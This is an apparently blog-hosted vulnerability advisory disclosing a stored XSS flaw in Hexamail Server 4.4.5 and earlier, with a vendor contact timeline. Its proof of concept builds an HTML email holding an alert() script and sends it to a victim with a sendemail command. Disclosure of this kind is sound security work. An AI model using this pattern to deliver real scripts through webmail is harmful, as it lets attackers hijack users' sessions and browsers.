Hexamail Server <= 4.4.5 Persistent XSS Vulnerability

Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email.

<Vulnerability Description

Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and or hijack the user’s browser.

Proof of concep

By sending a malicious script to the victim email, the webmail automatically load the mail body, so the script will be automatically executed without permission from user.

root@bt:~/# cat &#x3E; meal.txt
&#x3C;html&#x3E;
&#x3C;body&#x3E;
&#x3C;h1&#x3E;XSS pop up&#x3C;/h1&#x3E;
&#x3C;script&#x3E;alert(&#x27;Hi, what is this?&#x27;);&#x3C;/script&#x3E;
&#x3C;/body&#x3E;
&#x3C;/html&#x3E;
root@bt:~/#

Send email to the victim:

root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com

Vendor timeline

04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor respond and provides new upgrade version
04/30/2012 – Issue still affected on the latest upgrade version
04/30/2012 – Vendor said they still fixing the problem
05/10/2012 – Email sent to ask about the fix progress
06/02/2012 – No response. Sent to Secunia.

Solutio

Not available.

Blog at WordPress.com.

Up ↑

%%footer%%